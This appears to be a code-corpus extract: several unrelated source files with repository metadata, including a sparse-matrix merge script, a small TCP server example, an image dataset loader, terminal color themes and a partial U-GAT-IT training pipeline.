path('info-declaracion/<int:pk>/', InfoDeclaracionFormView.as_view(),
name='info-declaracion'),
]
| 45.37931 | 110 | 0.693769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 376 | 0.285714 |
a4fdc2ff6fb2daea0ed4afc31809a891b4b75ce0 | 1,501 | py | Python | rpbp/translation_prediction/merge_replicate_orf_profiles.py | HeyLifeHD/rp-bp | 9c59b1bc0267400747477467c45f96364d5528e1 | [
"MIT"
] | 6 | 2016-05-16T18:52:41.000Z | 2021-12-31T06:27:29.000Z | rpbp/translation_prediction/merge_replicate_orf_profiles.py | HeyLifeHD/rp-bp | 9c59b1bc0267400747477467c45f96364d5528e1 | [
"MIT"
] | 110 | 2016-06-22T13:24:39.000Z | 2022-02-07T09:29:14.000Z | rpbp/translation_prediction/merge_replicate_orf_profiles.py | HeyLifeHD/rp-bp | 9c59b1bc0267400747477467c45f96364d5528e1 | [
"MIT"
] | 5 | 2017-05-22T12:21:51.000Z | 2022-02-06T10:32:56.000Z | #! /usr/bin/env python3
import argparse
import logging
import scipy.io
import pbio.misc.logging_utils as logging_utils
import pbio.misc.math_utils as math_utils
logger = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description="""This script adds the ORF profiles from a set
of profiles (presumably, each file corresponds to one replicate from a condition).
The script keeps the profiles in sparse matrix format, so it is fairly efficient.""")
parser.add_argument('profiles', help="The (mtx) files containing the ORF profiles", nargs='+')
parser.add_argument('out', help="The (mtx.gz) output file containing the merged profiles")
logging_utils.add_logging_options(parser)
args = parser.parse_args()
logging_utils.update_logging(args)
msg = "Reading first ORF profile"
logger.info(msg)
merged_profiles = scipy.io.mmread(args.profiles[0]).tocsr()
msg = "Adding each additional profile"
logger.info(msg)
for profile_file in args.profiles[1:]:
msg = "Reading file: {}".format(profile_file)
logger.info(msg)
profiles = scipy.io.mmread(profile_file).tocsr()
merged_profiles = merged_profiles + profiles
msg = "Writing merged profiles to disk"
logger.info(msg)
math_utils.write_sparse_matrix(args.out, merged_profiles)
if __name__ == '__main__':
main()
| 30.02 | 98 | 0.702199 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 495 | 0.32978 |
a4fdfb3a84f9a4748985f013f6aacec4b99c4f66 | 959 | py | Python | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | 1 | 2015-03-05T04:42:30.000Z | 2015-03-05T04:42:30.000Z | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | 1 | 2017-06-06T15:36:21.000Z | 2019-05-29T15:07:18.000Z | examples/basicServer.py | lwahlmeier/python-litesockets | 2d057e171ac56271c2a7c4e42425b6c6d7ed7011 | [
"Unlicense"
] | null | null | null | from litesockets import SocketExecuter, TcpServer
import time
#This starts a SocketExecuter with default of 5 threads
SE = SocketExecuter()
#creates a tcpServer listening on localhost port 11882 (socket is not open yet)
server = TcpServer("localhost", 11882)
#This is ran once the far side is connected
def newConnection(client):
print "Got new TCPClient", client
#need to add the client to the SocketExecuter to be able to do anythign with it
SE.addClient(client)
client.addWrite("hello\n")
#if we wanted to check for incoming data we would add a reader to the client
time.sleep(.01)
#End the clients connection
client.end()
#We assign a fuction with 1 argument that will get a client for the server
server.onNew = newConnection
#The socket is not open, but will not yet accept anything
server.connect()
#The server will now accept clients that connect to its listen socket
SE.addServer(server)
time.sleep(100000)
| 29.96875 | 83 | 0.754953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 598 | 0.623566 |
a4feafde3d05274cb509f43c2de00534da560e12 | 6,679 | py | Python | datasets.py | jackwang0108/AlexNet | 53ff64823c461c752499108f2845d83e877a3c07 | [
"MIT"
] | 1 | 2022-03-22T09:34:25.000Z | 2022-03-22T09:34:25.000Z | datasets.py | jackwang0108/AlexNet | 53ff64823c461c752499108f2845d83e877a3c07 | [
"MIT"
] | null | null | null | datasets.py | jackwang0108/AlexNet | 53ff64823c461c752499108f2845d83e877a3c07 | [
"MIT"
] | null | null | null |
# Standard Library
import pickle
from typing import *
from pathlib import Path
# Third-party Party
import numpy as np
import PIL.Image as Image
from colorama import Fore, init
# Torch Library
import torch
import torch.utils.data as data
import torchvision.transforms as T
# My Library
from helper import visualize_np, visualize_plt, visualize_pil
from helper import ProjectPath, DatasetPath
from helper import ClassLabelLookuper
init(autoreset=True)
ImageType = TypeVar(
"ImageType",
np.ndarray, torch.Tensor, Path
)
ClassType = TypeVar(
"ClassType",
np.ndarray, torch.Tensor
)
class MultiDataset(data.Dataset):
def __init__(self, dataset: str, split: str):
super(MultiDataset, self).__init__()
assert split in (s := ["train", "val", "test"]), f"{Fore.RED}Invalid split, should be in {s}"
self.split = split
self.dataset = dataset
self._dataset_reader: Dict[str, Callable] = {
"Cifar10": self.__read_cifar10,
"Cifar100": self.__read_cifar100,
"PascalVOC2012": self.__read_PascalVOC2012
}
assert dataset in self._dataset_reader.keys(), f"{Fore.RED}Invalid dataset, please select in " \
f"{self._dataset_reader.keys()}."
self.image: Union[np.ndarray, List[Path]]
self.label: np.ndarray
self.image, self.label = self._dataset_reader[self.dataset]()
self.select_train_val()
self.num_class = len(ClassLabelLookuper(self.dataset).cls)
def __len__(self) -> int:
return len(self.image)
def __getitem__(self, idx) -> Tuple[torch.Tensor, torch.Tensor]:
image, label = self.image[idx], self.label[idx]
if isinstance(image, Path):
image = Image.open(image)
else:
image = Image.fromarray(image.astype(np.uint8)).convert("RGB")
return self.transform(image), label
def set_transform(self, transform: T.Compose) -> "MultiDataset":
self.transform = transform
return self
def select_train_val(self, trainval_ratio: Optional[float] = 0.2) -> None:
# get image of each label
self.label_image: Dict[int, np.ndarray] = {}
for label in np.unique(self.label):
self.label_image[label] = np.where(self.label == label)[0]
if self.dataset in ["Cifar10", "Cifar100"]:
if self.split == "test":
return
else:
# generate train val if not exists, else load
if (config_path := ProjectPath.config.joinpath(f"{self.dataset}.npz")).exists():
data = np.load(config_path)
ratio, train, val =data["ratio"], data["train"], data["val"]
if not config_path.exists() or ratio != trainval_ratio:
train, val = [], []
for label, image_idx in self.label_image.items():
np.random.shuffle(image_idx)
val_num = int(trainval_ratio * len(image_idx))
val.append(image_idx[:val_num])
train.append(image_idx[val_num:])
train = np.stack(train, axis=0)
val = np.stack(val, axis=0)
config_path.parent.mkdir(parents=True, exist_ok=True)
np.savez(config_path, ratio=trainval_ratio, train=train, val=val)
train = np.concatenate(train, axis=0)
val = np.concatenate(val, axis=0)
# select train val
if self.split == "val":
self.image = self.image[val]
self.label = self.label[val]
else:
self.image = self.image[train]
self.label = self.label[train]
else:
return
def __read_cifar10(self) -> Tuple[np.ndarray, np.ndarray]:
if self.split in ["train", "val"]:
data = []
for batch in DatasetPath.Cifar10.train:
with batch.open(mode="rb") as f:
data.append(pickle.load(f, encoding="bytes"))
image = np.concatenate([i[b"data"].reshape(-1, 3, 32, 32) for i in data], axis=0)
label = np.concatenate([i[b"labels"] for i in data], axis=0)
else:
with DatasetPath.Cifar10.test.open(mode="rb") as f:
data = pickle.load(f, encoding="bytes")
image = data[b"data"].reshape(-1, 3, 32, 32)
label = data[b"labels"]
return image.transpose(0, 2, 3, 1), np.array(label)
def __read_cifar100(self) -> Tuple[np.ndarray, np.ndarray]:
if self.split in ["train", "val"]:
with DatasetPath.Cifar100.train.open(mode="rb") as f:
data = pickle.load(f, encoding="bytes")
image = data[b"data"].reshape(-1, 3, 32, 32)
label = data[b"fine_labels"]
else:
with DatasetPath.Cifar100.test.open(mode="rb") as f:
data = pickle.load(f, encoding="bytes")
image = data["data"].reshape(-1, 3, 32, 32)
label = data["label"]
return image.transpose(0, 2, 3, 1), np.asarray(label)
def __read_PascalVOC2012(self) -> Tuple[List[Path], np.ndarray]:
image = []
label = []
ccn = ClassLabelLookuper(datasets="PascalVOC2012")
if self.split in "train":
for k, v in DatasetPath.PascalVOC2012.train_idx.items():
image.extend(v)
label.extend([ccn.get_label(k)] * len(v))
elif self.split == "val":
for k, v in DatasetPath.PascalVOC2012.val_idx.items():
image.extend(v)
label.extend([ccn.get_label(k)] * len(v))
else:
assert False, f"{Fore.RED}PascalVOC2012 test data is not accesibly"
# Attention: PascalVOC2012 中图像是存在重复的
image, idx = np.unique(image, return_index=True)
return image, np.array(label)[idx]
if __name__ == "__main__":
# md = MultiDataset(dataset="PascalVOC2012", split="val")
# tt = T.Compose([
# T.RandomHorizontalFlip(),
# T.Resize((224, 224)),
# T.ToTensor()
# ])
# md.set_transform(tt)
md = MultiDataset(dataset="Cifar100", split="train")
tt = T.Compose([
T.RandomHorizontalFlip(),
T.ToTensor()
])
md.set_transform(tt)
ccn = ClassLabelLookuper(datasets=md.dataset)
dl = data.DataLoader(md, batch_size=64)
for x, y in dl:
print(x.shape)
visualize_plt(x, [ccn.get_class(i.item()) for i in y])
break
| 37.734463 | 104 | 0.568947 | 5,471 | 0.816933 | 0 | 0 | 0 | 0 | 0 | 0 | 911 | 0.136031 |
3502a92d21f53788d990c4901fe08c12c3d15616 | 11,221 | py | Python | spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 45b2a3ca1ebe7aad5fe2d18536199dfb57d43264 | [
"MIT"
] | 169 | 2017-03-12T00:42:45.000Z | 2022-03-16T20:03:55.000Z | spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 45b2a3ca1ebe7aad5fe2d18536199dfb57d43264 | [
"MIT"
] | 200 | 2017-01-12T23:51:27.000Z | 2022-03-29T15:20:12.000Z | spyder_terminal/widgets/style/themes.py | mrclary/spyder-terminal | 45b2a3ca1ebe7aad5fe2d18536199dfb57d43264 | [
"MIT"
] | 70 | 2017-01-13T00:08:59.000Z | 2022-03-31T19:05:47.000Z | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see LICENSE.txt for details)
# -----------------------------------------------------------------------------
ANSI_COLORS = {
'emacs': {
'black': '#000000',
'red': '#800000',
'green': '#005100',
'yellow': '#abab67',
'blue': '#151d51',
'magenta': '#510051',
'cyan': '#105151',
'white': '#ffffff',
'brightBlack': '#555555',
'brightRed': '#c80000',
'brightGreen': '#00aa00',
'brightYellow': '#cbcb7b',
'brightBlue': '#3c51e8',
'brightMagenta': '#900090',
'brightCyan': '#20a7a7',
'brightWhite': '#ffffff'
},
'idle': {
'black': '#ffffff',
'red': '#8a0000',
'green': '#008a00',
'yellow': '#8a4000',
'blue': '#00008a',
'magenta': '#5a005a',
'cyan': '#105151',
'white': '#ffffff',
'brightBlack': '#555555',
'brightRed': '#dd0000',
'brightGreen': '#00aa00',
'brightYellow': '#ff7700',
'brightBlue': '#0000ff',
'brightMagenta': '#900090',
'brightCyan': '#20a7a7',
'brightWhite': '#ffffff'
},
'monokai': {
'black': '#48483e',
'red': '#dc2566',
'green': '#8fc029',
'yellow': '#d4c96e',
'blue': '#55bcce',
'magenta': '#9358fe',
'cyan': '#56b7a5',
'white': '#f8f8f2',
'brightBlack': '#76715e',
'brightRed': '#fa2772',
'brightGreen': '#a7e22e',
'brightYellow': '#e7db75',
'brightBlue': '#66d9ee',
'brightMagenta': '#ae82ff',
'brightCyan': '#66efd5',
'brightWhite': '#f9f8f5'
},
'pydev': {
'black': '#ffffff',
'red': '#800000',
'green': '#00aa00',
'yellow': '#ffff99',
'blue': '#0000ff',
'magenta': '#900090',
'cyan': '#007f7f',
'white': '#efefef',
'brightBlack': '#c0c0c0',
'brightRed': '#c10000',
'brightGreen': '#00cc00',
'brightYellow': '#fff569',
'brightBlue': '#015aff',
'brightMagenta': '#bf00bf',
'brightCyan': '#00a5a5',
'brightWhite': '#ffffff'
},
'scintilla': {
'black': '#ffffff',
'red': '#800000',
'green': '#007f00',
'yellow': '#ffff99',
'blue': '#00007f',
'magenta': '#7f007f',
'cyan': '#007f7f',
'white': '#efefef',
'brightBlack': '#adadad',
'brightRed': '#c10000',
'brightGreen': '#00ab00',
'brightYellow': '#fff569',
'brightBlue': '#0000ff',
'brightMagenta': '#be00be',
'brightCyan': '#00a5a5',
'brightWhite': '#ffffff'
},
'spyder': {
'black': '#ffffff',
'red': '#800000',
'green': '#00aa00',
'yellow': '#ffff99',
'blue': '#0000ff',
'magenta': '#900090',
'cyan': '#27b5ac',
'white': '#efefef',
'brightBlack': '#adadad',
'brightRed': '#c10000',
'brightGreen': '#00c800',
'brightYellow': '#fff569',
'brightBlue': '#0a37ff',
'brightMagenta': '#d500d5',
'brightCyan': '#2dd0c5',
'brightWhite': '#ffffff'
},
'spyder/dark': {
'black': '#19232D',
'red': '#c80000',
'green': '#11a642',
'yellow': '#c5bb29',
'blue': '#558eff',
'magenta': '#aa00aa',
'cyan': '#20b3a7',
'white': '#ffffff',
'brightBlack': '#4b4b4b',
'brightRed': '#ef0000',
'brightGreen': '#13c24b',
'brightYellow': '#e6e13f',
'brightBlue': '#4395ff',
'brightMagenta': '#da00da',
'brightCyan': '#23cbbd',
'brightWhite': '#ffffff'
},
'zenburn': {
'black': '#3F3F3F',
'red': '#705050',
'green': '#60B48A',
'yellow': '#DFAF8F',
'blue': '#506070',
'magenta': '#DC8CC3',
'cyan': '#8CD0D3',
'white': '#DCDCCC',
'brightBlack': '#709080',
'brightRed': '#DCA3A3',
'brightGreen': '#C3BF9F',
'brightYellow': '#F0DFAF',
'brightBlue': '#94BFF3',
'brightMagenta': '#EC93D3',
'brightCyan': '#93E0E3',
'brightWhite': '#DCDCCC'
},
'solarized/light': {
'black': '#fdf6e3',
'red': '#dc322f',
'green': '#859900',
'yellow': '#b58900',
'blue': '#268bd2',
'magenta': '#6c71c4',
'cyan': '#2aa198',
'white': '#93a1a1',
'brightBlack': '#657b83',
'brightRed': '#dc322f',
'brightGreen': '#859900',
'brightYellow': '#b58900',
'brightBlue': '#268bd2',
'brightMagenta': '#6c71c4',
'brightCyan': '#2aa198',
'brightWhite': '#fdf6e3'
},
'solarized/dark': {
'black': '#002b36',
'red': '#dc322f',
'green': '#859900',
'yellow': '#b58900',
'blue': '#268bd2',
'magenta': '#6c71c4',
'cyan': '#2aa198',
'white': '#93a1a1',
'brightBlack': '#657b83',
'brightRed': '#dc322f',
'brightGreen': '#859900',
'brightYellow': '#b58900',
'brightBlue': '#268bd2',
'brightMagenta': '#6c71c4',
'brightCyan': '#2aa198',
'brightWhite': '#fdf6e3'
},
'inkpot': {
'black': '#1f1f27',
'red': '#CD5200',
'green': '#9DCD00',
'yellow': '#cd8b00',
'blue': '#87cefa',
'magenta': '#8b8bff',
'cyan': '#87FAE5',
'white': '#93a1a1',
'brightBlack': '#313131',
'brightRed': '#CD2300',
'brightGreen': '#C0CD00',
'brightYellow': '#ffcd8b',
'brightBlue': '#B9E1FA',
'brightMagenta': '#A3A3FF',
'brightCyan': '#B8FAEE',
'brightWhite': '#cfbfad'
},
'minimal': {
'black': '#ffffff',
'red': '#D22D72',
'green': '#568C3B',
'yellow': '#8A8A0F',
'blue': '#257FAD',
'magenta': '#5D5DB1',
'cyan': '#2D8F6F',
'white': '#7EA2B4',
'brightBlack': '#5A7B8C',
'brightRed': '#D22D72',
'brightGreen': '#568C3B',
'brightYellow': '#8A8A0F',
'brightBlue': '#257FAD',
'brightMagenta': '#5D5DB1',
'brightCyan': '#2D8F6F',
'brightWhite': '#EBF8FF'
},
'nightlion': {
'black': '#4c4c4c',
'red': '#bb0000',
'green': '#5fde8f',
'yellow': '#f3f167',
'blue': '#276bd8',
'magenta': '#bb00bb',
'cyan': '#00dadf',
'white': '#bbbbbb',
'brightBlack': '#555555',
'brightRed': '#ff5555',
'brightGreen': '#55ff55',
'brightYellow': '#ffff55',
'brightBlue': '#5555ff',
'brightMagenta': '#ff55ff',
'brightCyan': '#55ffff',
'brightWhite': '#ffffff'
},
'notepad++': {
'black': '#ffffff',
'red': '#CC342B',
'green': '#198844',
'yellow': '#FBA922',
'blue': '#3971ED',
'magenta': '#A36AC7',
'cyan': '#3971ED',
'white': '#C5C8C6',
'brightBlack': '#969896',
'brightRed': '#CC342B',
'brightGreen': '#198844',
'brightYellow': '#FBA922',
'brightBlue': '#3971ED',
'brightMagenta': '#A36AC7',
'brightCyan': '#3971ED',
'brightWhite': '#FFFFFF'
},
'oblivion': {
'black': '#1D1F21',
'red': '#CC6666',
'green': '#B5BD68',
'yellow': '#F0C674',
'blue': '#81A2BE',
'magenta': '#B294BB',
'cyan': '#8ABEB7',
'white': '#C5C8C6',
'brightBlack': '#969896',
'brightRed': '#CC6666',
'brightGreen': '#B5BD68',
'brightYellow': '#F0C674',
'brightBlue': '#81A2BE',
'brightMagenta': '#B294BB',
'brightCyan': '#8ABEB7',
'brightWhite': '#FFFFFF'
},
'obsidian': {
'black': '#232C31',
'red': '#2A5491',
'green': '#237986',
'yellow': '#A03B1E',
'blue': '#484D79',
'magenta': '#C59820',
'cyan': '#B02F30',
'white': '#9EA7A6',
'brightBlack': '#3F4944',
'brightRed': '#2A5491',
'brightGreen': '#237986',
'brightYellow': '#A03B1E',
'brightBlue': '#484D79',
'brightMagenta': '#C59820',
'brightCyan': '#B02F30',
'brightWhite': '#B5D8F6'
},
'pastel': {
'black': '#000000',
'red': '#c37372',
'green': '#72c373',
'yellow': '#c2c372',
'blue': '#7372c3',
'magenta': '#c372c2',
'cyan': '#72c2c3',
'white': '#d9d9d9',
'brightBlack': '#323232',
'brightRed': '#dbaaaa',
'brightGreen': '#aadbaa',
'brightYellow': '#dadbaa',
'brightBlue': '#aaaadb',
'brightMagenta': '#dbaada',
'brightCyan': '#aadadb',
'brightWhite': '#ffffff'
},
'retta': {
'black': '#000000',
'red': '#A54242',
'green': '#8C9440',
'yellow': '#de935f',
'blue': '#5F819D',
'magenta': '#85678F',
'cyan': '#5E8D87',
'white': '#969896',
'brightBlack': '#373b41',
'brightRed': '#cc6666',
'brightGreen': '#b5bd68',
'brightYellow': '#f0c674',
'brightBlue': '#81a2be',
'brightMagenta': '#b294bb',
'brightCyan': '#8abeb7',
'brightWhite': '#c5c8c6'
},
'roboticket': {
'black': '#f5f5f5',
'red': '#E64569',
'green': '#89D287',
'yellow': '#DAB752',
'blue': '#439ECF',
'magenta': '#D961DC',
'cyan': '#64AAAF',
'white': '#B3B3B3',
'brightBlack': '#535353',
'brightRed': '#E4859A',
'brightGreen': '#A2CCA1',
'brightYellow': '#E1E387',
'brightBlue': '#6FBBE2',
'brightMagenta': '#E586E7',
'brightCyan': '#96DCDA',
'brightWhite': '#DEDEDE'
},
'sublime-monokai/extended': {
'black': '#222222',
'red': '#dc2566',
'green': '#8fc029',
'yellow': '#d4c96e',
'blue': '#55bcce',
'magenta': '#9358fe',
'cyan': '#56b7a5',
'white': '#f8f8f2',
'brightBlack': '#76715e',
'brightRed': '#fa2772',
'brightGreen': '#a7e22e',
'brightYellow': '#e7db75',
'brightBlue': '#66d9ee',
'brightMagenta': '#ae82ff',
'brightCyan': '#66efd5',
'brightWhite': '#f9f8f5'
},
'vibrant-ink': {
'black': '#191919',
'red': '#d00e18',
'green': '#138034',
'yellow': '#ffcb3e',
'blue': '#006bb3',
'magenta': '#6b2775',
'cyan': '#384564',
'white': '#ededed',
'brightBlack': '#5d504a',
'brightRed': '#f07e18',
'brightGreen': '#b1d130',
'brightYellow': '#fff120',
'brightBlue': '#4fc2fd',
'brightMagenta': '#de0071',
'brightCyan': '#5d504a',
'brightWhite': '#ffffff'
}
}
| 28.920103 | 79 | 0.441583 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,871 | 0.612334 |
350316f5b33bd2c36507f8f4409c13409120a8a7 | 20,209 | py | Python | research/cv/U-GAT-IT/src/models/UGATIT.py | mindspore-ai/models | 9127b128e2961fd698977e918861dadfad00a44c | [
"Apache-2.0"
] | 77 | 2021-10-15T08:32:37.000Z | 2022-03-30T13:09:11.000Z | research/cv/U-GAT-IT/src/models/UGATIT.py | mindspore-ai/models | 9127b128e2961fd698977e918861dadfad00a44c | [
"Apache-2.0"
] | 3 | 2021-10-30T14:44:57.000Z | 2022-02-14T06:57:57.000Z | research/cv/U-GAT-IT/src/models/UGATIT.py | mindspore-ai/models | 9127b128e2961fd698977e918861dadfad00a44c | [
"Apache-2.0"
] | 24 | 2021-10-15T08:32:45.000Z | 2022-03-24T18:45:20.000Z | # Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
pipline for U-GAT-IT
"""
import time
import math
import os
from glob import glob
import cv2
import numpy as np
import mindspore.ops as ops
from mindspore import nn
from mindspore import save_checkpoint, load_checkpoint, load_param_into_net
from mindspore.common import initializer as init
from mindspore.communication.management import get_rank
from .networks import ResnetGenerator, Discriminator, GWithLossCell, DWithLossCell
from .cell import TrainOneStepG, TrainOneStepD, Generator
from ..utils.tools import denorm, tensor2numpy, RGB2BGR, cam
from ..dataset.dataset import TrainDataLoader, TestDataLoader
from ..metrics.metrics import mean_kernel_inception_distance
class UGATIT:
"""pipline"""
def __init__(self, args):
self.light = args.light
self.distributed = args.distributed
self.mode = args.phase
if self.light:
self.model_name = 'UGATIT_light'
else:
self.model_name = 'UGATIT'
self.modelart = args.enable_modelarts
self.train_url = args.train_url
self.output_path = args.output_path
self.dataset = args.dataset
self.data_path = args.data_path
self.decay_flag = args.decay_flag
self.epoch = args.epoch
self.decay_epoch = args.decay_epoch
self.batch_size = args.batch_size
self.print_freq = args.print_freq
self.save_freq = args.save_freq
self.lr_policy = 'linear'
self.loss_scale = args.loss_scale
self.lr = args.lr
self.weight_decay = args.weight_decay
self.ch = args.ch
self.use_global_norm = args.use_global_norm
""" Weight """
self.adv_weight = args.adv_weight
self.cycle_weight = args.cycle_weight
self.identity_weight = args.identity_weight
self.cam_weight = args.cam_weight
self.weights = [self.adv_weight, self.cycle_weight, self.identity_weight, self.cam_weight]
""" Generator """
self.n_res = args.n_res
""" Discriminator """
self.n_dis = args.n_dis
self.img_size = args.img_size
self.img_ch = args.img_ch
self.resume = args.resume
"""utils"""
self.oneslike = ops.OnesLike()
self.zeroslike = ops.ZerosLike()
self.assign = ops.Assign()
print()
print("##### Information #####")
print("# light : ", self.light)
print("# dataset : ", self.dataset)
print("# batch_size : ", self.batch_size)
print("# epochs: ", self.epoch)
print()
print("##### Generator #####")
print("# residual blocks : ", self.n_res)
print()
print("##### Discriminator #####")
print("# discriminator layer : ", self.n_dis)
print()
print("##### Weight #####")
print("# adv_weight : ", self.adv_weight)
print("# cycle_weight : ", self.cycle_weight)
print("# identity_weight : ", self.identity_weight)
print("# cam_weight : ", self.cam_weight)
##################################################################################
# Model
##################################################################################
def build_model(self):
"""build model"""
self.train_nums = 1
if self.mode == 'train':
train_loader, test_loader, train_nums = TrainDataLoader(self.img_size,
self.data_path,
self.dataset,
self.batch_size,
self.distributed)
self.train_loader = train_loader
self.test_iterator = test_loader.create_dict_iterator()
self.train_nums = train_nums
print("Training dataset size = ", self.train_nums)
elif self.mode == 'test':
test_loader = TestDataLoader(self.img_size,
self.data_path,
self.dataset)
self.test_iterator = test_loader.create_dict_iterator()
else:
raise RuntimeError("Invalid mode")
print("Dataset load finished")
self.genA2B = ResnetGenerator(input_nc=3,
output_nc=3,
ngf=self.ch,
n_blocks=self.n_res,
img_size=self.img_size,
light=self.light)
self.genB2A = ResnetGenerator(input_nc=3,
output_nc=3,
ngf=self.ch,
n_blocks=self.n_res,
img_size=self.img_size,
light=self.light)
self.disGA = Discriminator(input_nc=3, ndf=self.ch, n_layers=7)
self.disGB = Discriminator(input_nc=3, ndf=self.ch, n_layers=7)
self.disLA = Discriminator(input_nc=3, ndf=self.ch, n_layers=5)
self.disLB = Discriminator(input_nc=3, ndf=self.ch, n_layers=5)
self.generator = Generator(self.genA2B, self.genB2A)
self.init_weights(self.genA2B, 'KaimingUniform', math.sqrt(5))
self.init_weights(self.genB2A, 'KaimingUniform', math.sqrt(5))
self.init_weights(self.disGA, 'KaimingUniform', math.sqrt(5))
self.init_weights(self.disGB, 'KaimingUniform', math.sqrt(5))
self.init_weights(self.disLA, 'KaimingUniform', math.sqrt(5))
self.init_weights(self.disLB, 'KaimingUniform', math.sqrt(5))
self.start_epoch = 1
if self.resume:
model_list = glob(os.path.join(self.output_path, self.dataset, 'model', '*.ckpt'))
if model_list:
model_list.sort()
self.start_epoch = int(model_list[-1].split('_')[-1].split('.')[0])
self.load(os.path.join(self.output_path, self.dataset, 'model'), self.start_epoch)
print(" [*]Epoch %d Load SUCCESS" % self.start_epoch)
start_step = (self.start_epoch - 1) * self.train_nums
self.learning_rate = self.get_lr()[start_step:]
loss_scale = self.loss_scale
self.D_loss_net = DWithLossCell(self.disGA,
self.disLA,
self.disGB,
self.disLB,
self.weights)
self.G_loss_net = GWithLossCell(self.generator,
self.disGA,
self.disLA,
self.disGB,
self.disLB,
self.weights)
self.G_optim = nn.Adam(self.generator.trainable_params(),
learning_rate=self.learning_rate,
beta1=0.5,
beta2=0.999,
weight_decay=self.weight_decay)
self.D_optim = nn.Adam(self.D_loss_net.trainable_params(),
learning_rate=self.learning_rate,
beta1=0.5,
beta2=0.999,
weight_decay=self.weight_decay)
self.D_train_net = TrainOneStepD(self.D_loss_net, self.D_optim, loss_scale, self.use_global_norm)
self.G_train_net = TrainOneStepG(self.G_loss_net, self.generator, self.G_optim,
loss_scale, self.use_global_norm)
def get_lr(self):
"""
Learning rate generator.
"""
if self.lr_policy == 'linear':
lrs = [self.lr] * self.train_nums * self.decay_epoch
for epoch in range(self.decay_epoch, self.epoch):
lr_epoch = self.lr * (self.epoch - epoch) / (self.epoch - self.decay_epoch)
lrs += [lr_epoch] * self.train_nums
return lrs
return self.lr
def init_weights(self, net, init_type='normal', init_gain=0.02):
"""init weights"""
for _, cell in net.cells_and_names():
if isinstance(cell, (nn.Conv2d, nn.Conv2dTranspose, nn.Dense)):
if init_type == 'normal':
cell.weight.set_data(init.initializer(init.Normal(init_gain), cell.weight.shape))
elif init_type == 'xavier':
cell.weight.set_data(init.initializer(init.XavierUniform(init_gain), cell.weight.shape))
elif init_type == 'KaimingUniform':
cell.weight.set_data(init.initializer(init.HeUniform(init_gain), cell.weight.shape))
elif init_type == 'constant':
cell.weight.set_data(init.initializer(0.0005, cell.weight.shape))
else:
raise NotImplementedError('initialization method [%s] is not implemented' % init_type)
elif isinstance(cell, (nn.GroupNorm, nn.BatchNorm2d)):
cell.gamma.set_data(init.initializer('ones', cell.gamma.shape))
cell.beta.set_data(init.initializer('zeros', cell.beta.shape))
def train(self):
"""train"""
self.D_train_net.set_train()
self.G_train_net.set_train()
data_loader = self.train_loader.create_dict_iterator()
# training loop
print('training start !')
for epoch in range(self.start_epoch, self.epoch + 1):
i = 0
for data in data_loader:
i += 1
start_time = time.time()
real_A = data["image_A"]
real_B = data["image_B"]
# Update
fake_A2B, fake_B2A, Generator_loss = self.G_train_net(real_A, real_B)
Discriminator_loss = self.D_train_net(real_A, real_B, fake_A2B, fake_B2A)
# clip parameter of AdaILN and ILN, applied after optimizer step
for m in self.genA2B.cells_and_names():
if hasattr(m[1], 'rho'):
w = m[1].rho.data
w = ops.clip_by_value(w, 0, 1)
m[1].rho.data.set_data(w)
for m in self.genB2A.cells_and_names():
if hasattr(m[1], 'rho'):
w = m[1].rho.data
w = ops.clip_by_value(w, 0, 1)
m[1].rho.data.set_data(w)
print("epoch %d:[%5d/%5d] time per iter: %4.4f " % (epoch,
i,
self.train_nums,
time.time() - start_time))
print("d_loss:", Discriminator_loss)
print("g_loss:", Generator_loss)
if epoch % self.print_freq == 0:
if self.distributed:
if get_rank() == 0:
self.print(epoch)
save_checkpoint(self.genA2B,
os.path.join(self.output_path, self.dataset + '_genA2B_params_latest.ckpt'))
save_checkpoint(self.genB2A,
os.path.join(self.output_path, self.dataset + '_genB2A_params_latest.ckpt'))
save_checkpoint(self.disGA,
os.path.join(self.output_path, self.dataset + '_disGA_params_latest.ckpt'))
save_checkpoint(self.disGB,
os.path.join(self.output_path, self.dataset + '_disGB_params_latest.ckpt'))
save_checkpoint(self.disLA,
os.path.join(self.output_path, self.dataset + '_disLA_params_latest.ckpt'))
save_checkpoint(self.disLB,
os.path.join(self.output_path, self.dataset + '_disLB_params_latest.ckpt'))
else:
self.print(epoch)
save_checkpoint(self.genA2B,
os.path.join(self.output_path, self.dataset + '_genA2B_params_latest.ckpt'))
save_checkpoint(self.genB2A,
os.path.join(self.output_path, self.dataset + '_genB2A_params_latest.ckpt'))
save_checkpoint(self.disGA,
os.path.join(self.output_path, self.dataset + '_disGA_params_latest.ckpt'))
save_checkpoint(self.disGB,
os.path.join(self.output_path, self.dataset + '_disGB_params_latest.ckpt'))
save_checkpoint(self.disLA,
os.path.join(self.output_path, self.dataset + '_disLA_params_latest.ckpt'))
save_checkpoint(self.disLB,
os.path.join(self.output_path, self.dataset + '_disLB_params_latest.ckpt'))
if epoch % self.save_freq == 0:
if self.distributed:
if get_rank() == 0:
self.save(os.path.join(self.output_path, self.dataset, 'model'), epoch)
else:
self.save(os.path.join(self.output_path, self.dataset, 'model'), epoch)
def print(self, epoch):
"""save middle results"""
test_sample_num = 5
A2B = np.zeros((self.img_size * 7, 0, 3))
B2A = np.zeros((self.img_size * 7, 0, 3))
for _ in range(test_sample_num):
data = next(self.test_iterator)
